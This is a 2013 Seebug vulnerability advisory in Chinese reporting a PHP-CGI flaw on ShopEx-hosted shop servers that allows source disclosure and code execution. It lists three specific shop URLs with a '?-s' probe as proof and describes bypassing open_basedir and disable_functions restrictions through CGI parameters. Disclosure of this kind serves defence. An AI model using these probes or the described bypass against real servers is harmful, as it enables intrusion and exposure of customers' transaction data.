ShopEx某些服务器存在任意代码执行漏洞(可泄漏用户交易数据)

2013-12-25T00:00:00
ID SSV:93440
Type seebug
Reporter Root
Modified 2013-12-25T00:00:00

Description

简要描述:

可执行命令,查看源码!

详细说明:

php cgi漏洞 http://shop322763.p13.shopex.cn/

漏洞证明:

http://shop322763.p13.shopex.cn/?-s http://shop319398.p09.shopex.cn/?-s http://shop317459.p21.shopex.cn/?-s

<img src="https://images.seebug.org/upload/201312/25121415e485b86b3747cd7272a69af5637a4379.jpg" alt="QQ截图20131225121359.jpg" width="600" onerror="javascript:errimg(this);">

尝试执行PHP代码,虽然有open_basedir,disable_functions的限制,不过我能直接CGI方式给PHP传参,这些限制自然不在话下,bypass之。

<img src="https://images.seebug.org/upload/201312/2512413254ee6c5818250e60d4f1179db974c8c6.png" alt="111.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201312/251241546871a6f79c839ac6b89600f5dae20576.png" alt="222.png" width="600" onerror="javascript:errimg(this);">

影响的用户太多了,厂商还是自查吧。。。